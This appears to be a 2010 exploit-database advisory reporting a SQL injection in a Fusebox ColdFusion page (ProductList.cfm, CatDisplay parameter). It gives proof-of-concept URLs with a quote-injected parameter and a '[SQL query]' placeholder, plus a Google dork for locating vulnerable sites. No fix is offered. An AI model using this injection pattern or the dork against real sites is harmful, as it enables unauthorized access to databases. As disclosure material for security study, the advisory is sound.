fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability

2010-05-29T00:00:00
ID 1337DAY-ID-12439
Type zdt
Reporter Shamus
Modified 2010-05-29T00:00:00

Description

Exploit for windows platform in category web applications

                                        
                                            =======================================================================
fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability
=======================================================================


Author       : Shamus
Date         : May, 29 th 2010
Location     : Solo && Jogjakarta, Indonesia
Web          : http://antijasakom.org/forum
Critical Lvl : Moderate
Impact       :-
Where        : From Remote
---------------------------------------------------------------------------
 
 
 
Affected
software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application :
-
version     : -
Vendor      : http://www.fusebox.org/
download  
: http://www.fusebox.org/go/getting-started/downloading-fusebox
Description
: Fusebox is the most popular framework for building ColdFusion and PHP
web applications.
"Fuseboxers" find that the framework releases
them from much of the drudgery of writing applications and enables them
to focus their efforts on creating great, customer-focused software.
--------------------------------------------------------------------------
 
 
 
Vulnerability:
~~~~~~~~~~~~
-
 
PoC/Exploit
:
~~~~~~~~~~
 
http://127.0.0.1/ProductList.cfm?CatDisplay=1%27[SQL
query]
http://127.0.0.1/[path]/ProductList.cfm?CatDisplay=1%27[SQL
query]
 
 
Dork:
~~~~~
Google : ProductList.cfm?CatDisplay
 
 
Solution:
~~~~~
-
N/A.



#  0day.today [2018-03-06]  #